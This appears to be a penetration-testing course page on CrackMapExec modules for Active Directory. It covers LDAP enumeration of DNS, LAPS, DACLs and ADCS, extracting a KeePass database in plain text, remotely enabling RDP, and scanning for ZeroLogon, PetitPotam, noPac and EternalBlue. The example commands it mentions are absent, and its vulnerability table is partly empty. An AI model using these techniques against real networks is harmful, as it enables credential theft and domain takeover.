Interesting Modules
A lot of CrackMapExec Modules can help during the reconnaissance and post exploitation phases. A lot of modules are using the SMB and LDAP protocols.
LDAP Modules
The LDAP modules fetch information from the Domain Controller.
get-network Module
Active Directory integrated DNS allows any users from the domain to dump all DNS records similar to a zone transfer. Using the get-network
module, it is possible, with any domain user, to dump all DNS records from the domain or forest zone.
Three options are possible
getting the IP only
getting the hostname only
getting both IPs and hostnames
Another tool to dump the DNS records is adidnsdump.
LAPS Module
LAPS stands for Local Administrator Password Solution. This solution aim to mitigate the issue of reusing the same password for local administrator on all domain joined computer. Indeed, an attacker that would have access to this password could compromise the entire domain. LAPS stores and manages local admin account passwords in Active Directory and can set a random and different password for each local administrator of domain joined servers. The passwords are protected by ACLs and only some specifics users can read them and request a password reset.
The module LAPS list all computers for which the user has read access to the LAPS passwords.
Machine-Account Quota (MAQ) Module
This module gives indication about how many machine accounts domain users are allowed to create. Some tactics to compromise the entire domain, such as some AD CS abuse or Resource Based Constrained Delegation, requires to create machine accounts.
daclread Module
DACLREAD allows to read the DACL (Domain Access Control List) of a specific Active Directory user. This module offers multiple options to enumerate DACL rights. The module does not read DACL recursively.
Example of reading Grace user DACL for read access
We can also query the domain controller to identify specifically who has DCSync rights.
ADCS Module
ADCS is a very popular privilege escalation technique used by attacker in a domain. CrackMapExec has a module to help the testers to enumerates PKI components in a domain.
List all PKI Enrollment Servers
List all certificates available in a PKI
SMB Modules
A lot of modules also use the SMB protocol.
Many SMB modules requires admin rights to work
get_netconnections and ioxidresolver Modules
To identify the network connection of a target. The get_netconnections module makes use of WMI and includes both IPV4 and IPV6 address. The ioxidresolver uses RPC and does not include IPV6 address.
Example of using get_netconnections:
Example of using ioxidresolver:
KeePass Module
KeePass is a very popular password manager. CrackMapExec has a module to discover a KeePass XML config file on a target host and extract all the database content in plain text. Several actions need to be perform to dump the database, but setting up ACTION=ALL will execute them all in one single command.
To find a KeePass XML file we can use the keepass_discover
module
The content of the KeePass database will be stored in /tmp/export.xml.
We can use grep to search for the password values.
A KeePass database has a .kdbx extension. When specifying the configuration path use / or double backslash \\
Enabling RDP
We can enable or disable RDP on a target using the RDP module.
Below is an example of enabling RDP on the target with the IP 10.129.203.121. If we want to disable RDP, we specify ACTION=disable
.
Vulnerability Modules
CrackMapExec offers various modules to identify (not to exploit) common vulnerabilities on a domain. All modules uses the SMB protocol and target the Domain Controller. Here are some of the most common vulnerabilities we can scan for using CME:
Vulnerability | Module | Description |
---|---|---|
ZeroLogOn | Unauthenticated attack. Leveraging the NetlogOn protocol. | |
PetitPotam | To coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw. | |
noPac | Allow the escalation of privileges of a regular domain user to a domain administrator. | |
DFSCoerce | NTLM relay attack leveraging the Distributed File System: Namespace Management Protocol (MS-DFSNM). | |
ShadowCoerce | Note: Use options | |
Eternal Blue MS17-10 | Unauthenticated RCE abusing the SMB service |
Last updated